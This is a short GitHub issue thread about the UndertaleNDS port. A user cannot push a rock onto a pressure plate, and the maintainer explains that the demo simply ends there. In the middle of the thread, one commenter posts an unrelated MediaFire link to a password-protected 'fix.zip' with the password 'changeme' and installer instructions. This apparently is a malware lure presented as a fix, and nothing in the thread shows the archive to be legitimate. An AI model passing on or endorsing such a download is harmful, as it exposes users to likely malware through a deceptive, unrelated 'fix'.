### ISSUE TITLE
Interaction

### ISSUE THREAD

**Issue by idontplayminecraft** [C3RV1/UndertaleNDS#46]
I was unable to get a video of it, but every time I try to push the rock onto the pressure plate… I can’t. It just does not let me.
Using TwiLightMenu++ on an old 2DS

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by idontplayminecraft** [comment]
@c0ffincolors 
![IMG_1268](https://github.com/user-attachments/assets/cd5ac8b8-938e-439f-aa48-075c9d170974)

**Comment by C3RV1** [comment]
That's where the demo ends for now. You cannot push the rock as there isn't any more progress implemented.

**Comment by idontplayminecraft** [comment]
ah ok, thanks
